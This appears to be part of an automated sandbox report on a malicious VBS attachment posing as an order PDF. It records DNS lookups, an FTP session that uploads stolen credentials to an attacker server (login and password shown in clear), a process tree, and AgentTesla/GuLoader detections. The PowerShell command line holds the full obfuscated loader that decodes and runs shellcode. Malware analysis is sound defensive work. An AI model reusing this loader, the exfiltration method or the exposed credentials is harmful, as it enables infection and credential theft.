                Nov 28, 2022 14:53:00.471657038 CET8.8.8.8192.168.2.70x1219No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                Nov 28, 2022 14:53:00.471657038 CET8.8.8.8192.168.2.70x1219No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                Nov 28, 2022 14:53:00.471657038 CET8.8.8.8192.168.2.70x1219No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                Nov 28, 2022 14:53:00.471657038 CET8.8.8.8192.168.2.70x1219No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                Nov 28, 2022 14:53:00.471657038 CET8.8.8.8192.168.2.70x1219No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                Nov 28, 2022 14:53:15.843619108 CET8.8.8.8192.168.2.70xc173No error (0)ftp.mcmprint.net185.31.121.136A (IP address)IN (0x0001)false
                • api.ipify.org
                • qwedft.gq
                TimestampSource PortDest PortSource IPDest IPCommands
                Nov 28, 2022 14:53:15.934382915 CET2149725185.31.121.136192.168.2.7220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.
                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.
                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login
                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                Nov 28, 2022 14:53:15.937089920 CET4972521192.168.2.7185.31.121.136USER klogz@mcmprint.net
                Nov 28, 2022 14:53:15.977685928 CET2149725185.31.121.136192.168.2.7331 User klogz@mcmprint.net OK. Password required
                Nov 28, 2022 14:53:15.977942944 CET4972521192.168.2.7185.31.121.136PASS l9Hh{#_(0shZ
                Nov 28, 2022 14:53:16.037839890 CET2149725185.31.121.136192.168.2.7230 OK. Current restricted directory is /
                Nov 28, 2022 14:53:16.078984976 CET2149725185.31.121.136192.168.2.7504 Unknown command
                Nov 28, 2022 14:53:16.079611063 CET4972521192.168.2.7185.31.121.136PWD
                Nov 28, 2022 14:53:16.120157957 CET2149725185.31.121.136192.168.2.7257 "/" is your current location
                Nov 28, 2022 14:53:16.121061087 CET4972521192.168.2.7185.31.121.136CWD /
                Nov 28, 2022 14:53:16.161766052 CET2149725185.31.121.136192.168.2.7250 OK. Current directory is /
                Nov 28, 2022 14:53:16.165164948 CET4972521192.168.2.7185.31.121.136TYPE I
                Nov 28, 2022 14:53:16.205966949 CET2149725185.31.121.136192.168.2.7200 TYPE is now 8-bit binary
                Nov 28, 2022 14:53:16.206445932 CET4972521192.168.2.7185.31.121.136PASV
                Nov 28, 2022 14:53:16.247524023 CET2149725185.31.121.136192.168.2.7227 Entering Passive Mode (185,31,121,136,239,129)
                Nov 28, 2022 14:53:16.290035009 CET4972521192.168.2.7185.31.121.136STOR PW_user-724536_2022_11_28_14_53_14.html
                Nov 28, 2022 14:53:16.334908009 CET2149725185.31.121.136192.168.2.7150 Accepted data connection
                Nov 28, 2022 14:53:16.376401901 CET2149725185.31.121.136192.168.2.7226-File successfully transferred
                226-File successfully transferred226 0.041 seconds (measured here), 11.13 Kbytes per second

                Click to jump to process

                Target ID:0
                Start time:14:50:11
                Start date:28/11/2022
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs"
                Imagebase:0x7ff650880000
                File size:163840 bytes
                MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:1
                Start time:14:50:12
                Start date:28/11/2022
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:CMD.EXE /c echo C:\Windows
                Imagebase:0x7ff7651b0000
                File size:273920 bytes
                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:2
                Start time:14:50:13
                Start date:28/11/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6edaf0000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:3
                Start time:14:50:18
                Start date:28/11/2022
                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKllHaaUptNa)Co;La[BaDHelNelUnIDimRapChoGrrGetTi(mi`"""cogRadPaiTe3Ba2Ho`"""Un)no]OppSwuWhbXelRuikucBi UnsMatFraJotSoiIscAs SoeWoxPitSyeKvrSenSt DiisanEptDa PaGAfeMbtFlCHylAfiSaptaRCagEnnKa(koiBenPatCa KaRSeuEklEnaYa,PsiSknWatMi BlLNiiKnkInvLa1Bl0Fo4Ru)Sy;Ra[AlDArlAblPrILimBepdeotirSetJa(pa`"""BauPasEdeSkrps3me2Gi`"""De)In]UdpInuBlbuolUniTmcUn FrsVitStaChtNoiBucAn AneTaxEttIneobrTanHj EtiArnSktSn KaGsueChtSnCOpllaiCaeSonNitBuRPaeClcUntUd(DeiCanAstEp UpdSaeGoslu,MiiUmnFotHe WiCMoeAcnGe)Fu;St[EnDFolNdlfrIramZopSkoPlrNitRe(Fu`"""SjkDyeTrrAnnOpePulAc3Un2su`"""Da)Am]RapopuTobFolDaiDrcAu AbsSptBiaCetFuiEncPa PseClxFetSeeMirSynTo GlISunCrtSpPdetPerUn PaESenFauDomAfSUnybasAdtbreUdmDiLStoFacReaGalTreSwsAmWKr(ScuKaiAdnLitUn StvKa1Al,DeiFrnsytTr OovGo2pl)re;ca}bl'Sa;An`$seSretLauKreMeoGarOpgbolKoeKorHusDr3Al=Sr[TrSRetDiuAneRooGrrSkgFolHeePorApsHa1Bl]In:Fl:MoVSniSarSetCaunoaSalAkATrlAvlKjoMucPe(Ne0no,Sc1Li0Bo4Co8Sp5ab7Th6Tr,Ko1Ud2Ka2Ag8Se8ba,Ch6Zo4Ja)Fo;Dr`$AfmKauGitJeaRitPaiMaoFanBniofsPetPa=Va(SeGPeemotAu-TiILhtSheFemOvPRerHjoStpFleFerHatUnyfe Pl-GuPOuaTjtAphMa Su'ErHUnKSuCMeUCh:Rn\SpNSueStcChrchoInlPeoTeggsiDecSnaAplWi\NaIDagAsnAdoForAreprrOviPenClgDieBerFasUm'Up)An.paSAckChiKlfSernyePrtSt;Pr`$EckUlrTaaUnkUnnRoiBonSggAweSurSmsAf Gl=Pi Rh[OkSAsyFoshytUneChmKo.ToCChoDanAnvMeebarHytVe]Ch:Th:BeFAfrCloMimDeBEnaUdsCieCo6Fo4OtSDitSerSuiAunSugMi(Fa`$EfmSouOvtUdaFitDeiReoMenRiiDosLotor)Re;Sp[FlSGuyUdstatFoeStmMe.WiRSkuDinUntAliMamTieUn.CiIUdnMetskeOvrKooSnpFiSDyeDirCrvMaiFrcFoeInsAl.SyMBeaTeransWrhkoaDelWi]Un:De:SkCAroStpSpyUn(Dr`$UlkCorToaOukFanHeiNonBlgCheSerFasLi,Mi Fl0He,Pa En Pu`$PoSPatDeuKaeBioPurVrgRulSkeOvrIwsIn3ie,To Sk`$MlkRerStaMekFrnRoiConAngSteOprOvsSa.SncCaodeuRanKrtPr)Un;Is[NeSMetebuBeePeoUnrSagOllUdeInrSasSo1Pr]Pe:Pa:SiEKanpiuUkmOpSTyySvsBrtcoeKrmHaLWeoAicLaaKrlWieMiswoWLn(Ba`$SpSDetSpuMaePaoNurUtgInlSaehyrEnsHj3Sc,Bi Kn0Me)Fo#Sk;""";Function Stueorglers4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $discontentment = $discontentment + $HS.Substring($i, 1); } $discontentment;}$Sudser0 = Stueorglers4 'riISyEScXFr ';$Sudser1= Stueorglers4 $Skoleeksempel;&$Sudser0 $Sudser1;;
                Imagebase:0xe60000
                File size:430592 bytes
                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high

                Target ID:4
                Start time:14:50:18
                Start date:28/11/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6edaf0000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:13
                Start time:14:51:20
                Start date:28/11/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
                Imagebase:0x890000
                File size:2170976 bytes
                MD5 hash:350C52F71BDED7B99668585C15D70EEA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:moderate

                Target ID:14
                Start time:14:51:21
                Start date:28/11/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP"
                Imagebase:0xbd0000
                File size:43176 bytes
                MD5 hash:C09985AE74F0882F208D75DE27770DFA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:17
                Start time:14:52:17
                Start date:28/11/2022
                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                Imagebase:0xb40000
                File size:106496 bytes
                MD5 hash:827875A7EE6003FC7F5301C613A2BB1C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000011.00000000.507338046.0000000000F20000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

                No disassembly